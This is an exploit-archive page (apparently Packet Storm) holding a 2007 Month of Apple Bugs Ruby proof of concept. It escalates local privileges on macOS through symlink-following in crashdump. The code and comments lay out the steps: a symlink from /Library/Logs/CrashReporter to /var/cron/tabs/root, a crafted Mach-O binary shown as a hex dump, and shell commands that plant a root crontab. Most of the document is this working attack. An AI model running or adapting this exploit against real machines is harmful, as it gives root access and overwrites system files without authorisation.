Month of Apple Bugs - crashdump follows symlinks within the /Library/Logs/CrashReporter/ directory, allowing admin-group users to execute arbitrary code and overwrite files with elevated privileges. In couple with a specially crafted Mach-O binary, this can be used to write a malicious crontab entry, which will run with root privileges. This ruby code demonstrates this vulnerability.
d2a1cdd08b0f39cc9d815a3572650b30#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M. Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# 1) Stop crashdump from writing to ~/Library/Logs via chmod 000 ~/Library/Logs/CrashReporter
# 2) Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log
# 3) Create a program with a modified __LINKEDIT segment that influences crashreporter output
#
# 0000320: 3800 0000 5f5f 4c49 4e4b 4544 4954 0000 8...__LINKEDIT..
# 0000330: 0000 0000 0040 0000 0010 0000 0030 0000 .....@.......0..
# 0000340: 2004 0000 0300 0000 0100 0000 0000 0000 ...............
# 0000350: 0400 0000 0e00 0000 1c00 0000 0c00 0000 ................
# 0000360: 2f75 7372 2f6c 6962 2f64 796c 6400 0000 /usr/lib/dyld...
# 0000370: 0c00 0000 3400 0000 1800 0000 68b7 9b45 ....4.......h..E
# 0000380: 0403 5800 0000 0100 0d0a 2a20 2a20 2a20 ..X.......* * *
# 0000390: 2a20 2a20 2f74 6d70 2f78 0d0a 2e64 796c * * /tmp/x...dyl
# 00003a0: 6962 0000 0200 0000 1800 0000 0030 0000 ib...........0..
#
# 4) Run the fake program which will crash and create /var/cron/tabs/root
# 5) Sleep and then create a legit crontab to refresh cron
SYMLINK_PATH = "/Library/Logs/CrashReporter/vuln.crash.log"
PWNERCYCLE = "ln -s /var/cron/tabs/root #{SYMLINK_PATH};" +
"chmod 000 ~/Library/Logs/CrashReporter/;" +
"crontab /tmp/fakecron;" +
"chmod +x /Users/Shared/r00t; sleep 61; ./vuln;"
def escalate()
puts "++ Fixing up a fake crontab"
fakecron = File.new("/tmp/fakecron", "w")
fakecron.print("* * * * * /usr/bin/id > /tmp/USERCRON\n")
fakecron.close
tmp_ex = File.new("/Users/Shared/r00t", "w")
tmp_ex.print("/usr/bin/id > /tmp/CRASHREPOWNED\n")
tmp_ex.close
system PWNERCYCLE
end
escalate()
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!